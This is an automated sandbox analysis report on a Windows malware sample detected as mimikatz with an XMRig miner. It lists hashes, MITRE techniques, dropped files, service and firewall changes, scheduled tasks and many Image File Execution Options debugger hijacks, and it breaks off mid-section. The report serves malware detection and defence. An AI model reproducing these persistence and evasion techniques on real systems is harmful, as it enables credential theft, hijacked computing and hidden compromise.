mimikatz | 273c5e335b5e885b8c77a2359e2a6f1e85c6cbb824be027c30fcb2ecd3bf3da6

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
03-05-2024 04:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe
Size

8.9MB
MD5

5e6a68f105d95ba6c52387c649436358
SHA1

cff5c065b237b0d7711748961e7468bba5e5fc68
SHA256

273c5e335b5e885b8c77a2359e2a6f1e85c6cbb824be027c30fcb2ecd3bf3da6
SHA512

5f118f39ef05fdcc9c4727d46da3385c8594dc103edc179ca1ae7a7c908399c870ee13f9d4ba490c8a01af5f0486961e5d7e0e162f2dd05552b55f556a177faf
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig discovery evasion execution miner persistence upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

wrribqi.exe

description pid process target process

PID 4340 created 1820 4340 wrribqi.exe spoolsv.exe
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (30775) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

description	pid	process	target process
PID 4340 created 1820	4340	wrribqi.exe	spoolsv.exe

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5024-137-0x00007FF72EAE0000-0x00007FF72EBCE000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

UPX dump on OEP (original entry point) 41 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3520-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/memory/3520-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
C:\Windows\etfblrkh\wrribqi.exe	UPX
behavioral2/memory/2768-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
C:\Windows\yfuzwlflh\Corporate\vfshost.exe	UPX
behavioral2/memory/5024-136-0x00007FF72EAE0000-0x00007FF72EBCE000-memory.dmp	UPX
behavioral2/memory/5024-137-0x00007FF72EAE0000-0x00007FF72EBCE000-memory.dmp	UPX
C:\Windows\Temp\yfuzwlflh\ktitzriiz.exe	UPX
behavioral2/memory/3544-152-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/3544-159-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
C:\Windows\Temp\pkiileske\citubz.exe	UPX
behavioral2/memory/5032-164-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/3472-170-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/816-174-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/1800-178-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/5032-181-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/1332-183-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/5080-187-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/628-191-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/5032-193-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/2364-196-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/5032-199-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/3860-201-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/4048-205-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/1844-209-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/5032-211-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/4128-214-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/1996-218-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/5032-220-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/4808-223-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/1948-227-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/4032-230-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/5032-231-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/464-233-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/1940-237-0x00007FF741220000-0x00007FF74127B000-memory.dmp	UPX
behavioral2/memory/5032-248-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/5032-249-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/5032-250-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/5032-252-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/5032-254-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX
behavioral2/memory/5032-255-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	UPX

XMRig Miner payload 12 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5032-181-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig
behavioral2/memory/5032-193-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig
behavioral2/memory/5032-199-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig
behavioral2/memory/5032-211-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig
behavioral2/memory/5032-220-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig
behavioral2/memory/5032-231-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig
behavioral2/memory/5032-248-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig
behavioral2/memory/5032-249-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig
behavioral2/memory/5032-250-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig
behavioral2/memory/5032-252-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig
behavioral2/memory/5032-254-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig
behavioral2/memory/5032-255-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3520-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3520-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
C:\Windows\etfblrkh\wrribqi.exe	mimikatz
behavioral2/memory/2768-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/5024-137-0x00007FF72EAE0000-0x00007FF72EBCE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

Processes:

wrribqi.exewpcap.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	wrribqi.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	wrribqi.exe

Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

3864 netsh.exe
4520 netsh.exe

pid	process
3864	netsh.exe
4520	netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

wrribqi.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	wrribqi.exe

Executes dropped EXE 29 IoCs

Processes:

wrribqi.exewrribqi.exewpcap.exebilmicikh.exevfshost.exexohudmc.exeqicmew.exektitzriiz.execitubz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exewrribqi.exektitzriiz.exegspkhusbb.exewrribqi.exe

pid	process
2768	wrribqi.exe
4340	wrribqi.exe
1928	wpcap.exe
1068	bilmicikh.exe
5024	vfshost.exe
2300	xohudmc.exe
3532	qicmew.exe
3544	ktitzriiz.exe
5032	citubz.exe
3472	ktitzriiz.exe
816	ktitzriiz.exe
1800	ktitzriiz.exe
1332	ktitzriiz.exe
5080	ktitzriiz.exe
628	ktitzriiz.exe
2364	ktitzriiz.exe
3860	ktitzriiz.exe
4048	ktitzriiz.exe
1844	ktitzriiz.exe
4128	ktitzriiz.exe
1996	ktitzriiz.exe
4808	ktitzriiz.exe
1948	ktitzriiz.exe
4032	ktitzriiz.exe
464	ktitzriiz.exe
652	wrribqi.exe
1940	ktitzriiz.exe
5000	gspkhusbb.exe
572	wrribqi.exe

Loads dropped DLL 12 IoCs

Processes:

wpcap.exebilmicikh.exe

pid	process
1928	wpcap.exe
1928	wpcap.exe
1928	wpcap.exe
1928	wpcap.exe
1928	wpcap.exe
1928	wpcap.exe
1928	wpcap.exe
1928	wpcap.exe
1928	wpcap.exe
1068	bilmicikh.exe
1068	bilmicikh.exe
1068	bilmicikh.exe

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\yfuzwlflh\Corporate\vfshost.exe	upx
behavioral2/memory/5024-136-0x00007FF72EAE0000-0x00007FF72EBCE000-memory.dmp	upx
behavioral2/memory/5024-137-0x00007FF72EAE0000-0x00007FF72EBCE000-memory.dmp	upx
C:\Windows\Temp\yfuzwlflh\ktitzriiz.exe	upx
behavioral2/memory/3544-152-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/3544-159-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
C:\Windows\Temp\pkiileske\citubz.exe	upx
behavioral2/memory/5032-164-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/3472-170-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/816-174-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/1800-178-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/5032-181-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/1332-183-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/5080-187-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/628-191-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/5032-193-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/2364-196-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/5032-199-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/3860-201-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/4048-205-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/1844-209-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/5032-211-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/4128-214-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/1996-218-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/5032-220-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/4808-223-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/1948-227-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/4032-230-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/5032-231-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/464-233-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/1940-237-0x00007FF741220000-0x00007FF74127B000-memory.dmp	upx
behavioral2/memory/5032-248-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/5032-249-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/5032-250-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/5032-252-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/5032-254-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx
behavioral2/memory/5032-255-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

93 ifconfig.me
94 ifconfig.me
Creates a Windows Service
persistence

flow	ioc
93	ifconfig.me
94	ifconfig.me

Drops file in System32 directory 18 IoCs

Processes:

wpcap.exexohudmc.exewrribqi.exe

description	ioc	process
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\qicmew.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\qicmew.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	wrribqi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4	wrribqi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	wrribqi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	wrribqi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4	wrribqi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	wrribqi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	wrribqi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	wrribqi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	wrribqi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	wrribqi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	wrribqi.exe

Drops file in Program Files directory 3 IoCs

Processes:

wpcap.exe

description	ioc	process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

Processes:

wrribqi.exegspkhusbb.execmd.exe2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe

description	ioc	process
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\xdvl-0.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\spoolsrv.xml	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\vimpcsvc.xml	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\AppCapture32.dll	wrribqi.exe
File opened for modification	C:\Windows\yfuzwlflh\ezuhehlec\Result.txt	gspkhusbb.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\trch-1.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\zlib1.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\svschost.xml	wrribqi.exe
File opened for modification	C:\Windows\etfblrkh\schoedcl.xml	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\schoedcl.xml	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\spoolsrv.xml	wrribqi.exe
File opened for modification	C:\Windows\etfblrkh\docmicfg.xml	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\AppCapture64.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\Corporate\vfshost.exe	wrribqi.exe
File created	C:\Windows\yfuzwlflh\ezuhehlec\gspkhusbb.exe	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\cnli-1.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\svschost.xml	wrribqi.exe
File created	C:\Windows\etfblrkh\vimpcsvc.xml	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\Shellcode.ini	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\trfo-2.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\vimpcsvc.exe	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\schoedcl.exe	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\libeay32.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\ssleay32.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\ucl.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\svschost.exe	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\docmicfg.xml	wrribqi.exe
File opened for modification	C:\Windows\etfblrkh\spoolsrv.xml	wrribqi.exe
File created	C:\Windows\yfuzwlflh\upbdrjv\swrpwe.exe	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\exma-1.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\spoolsrv.exe	wrribqi.exe
File created	C:\Windows\etfblrkh\svschost.xml	wrribqi.exe
File created	C:\Windows\etfblrkh\schoedcl.xml	wrribqi.exe
File created	C:\Windows\yfuzwlflh\Corporate\mimilib.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\ezuhehlec\Packet.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\tibe-2.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\vimpcsvc.xml	wrribqi.exe
File opened for modification	C:\Windows\etfblrkh\vimpcsvc.xml	wrribqi.exe
File opened for modification	C:\Windows\yfuzwlflh\Corporate\log.txt	cmd.exe
File created	C:\Windows\yfuzwlflh\ezuhehlec\scan.bat	wrribqi.exe
File created	C:\Windows\etfblrkh\wrribqi.exe	2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\etfblrkh\wrribqi.exe	2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe
File created	C:\Windows\yfuzwlflh\ezuhehlec\wpcap.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\posh-0.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\Corporate\mimidrv.sys	wrribqi.exe
File opened for modification	C:\Windows\yfuzwlflh\ezuhehlec\Packet.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\libxml2.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\ezuhehlec\ip.txt	wrribqi.exe
File created	C:\Windows\etfblrkh\spoolsrv.xml	wrribqi.exe
File created	C:\Windows\etfblrkh\docmicfg.xml	wrribqi.exe
File created	C:\Windows\yfuzwlflh\ezuhehlec\bilmicikh.exe	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\crli-0.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\docmicfg.xml	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\schoedcl.xml	wrribqi.exe
File created	C:\Windows\ime\wrribqi.exe	wrribqi.exe
File created	C:\Windows\yfuzwlflh\ezuhehlec\wpcap.exe	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\docmicfg.exe	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\coli-0.dll	wrribqi.exe
File created	C:\Windows\yfuzwlflh\UnattendGC\specials\tucl-1.dll	wrribqi.exe
File opened for modification	C:\Windows\etfblrkh\svschost.xml	wrribqi.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

3160 sc.exe
4424 sc.exe
2868 sc.exe
1416 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3160	sc.exe
4424	sc.exe
2868	sc.exe
1416	sc.exe

NSIS installer 3 IoCs

installer

Processes:

resource	yara_rule
C:\Windows\etfblrkh\wrribqi.exe	nsis_installer_2
C:\Windows\yfuzwlflh\ezuhehlec\wpcap.exe	nsis_installer_1
C:\Windows\yfuzwlflh\ezuhehlec\wpcap.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5000 schtasks.exe
4564 schtasks.exe
5040 schtasks.exe

pid	process
5000	schtasks.exe
4564	schtasks.exe
5040	schtasks.exe

Modifies data under HKEY_USERS 45 IoCs

Processes:

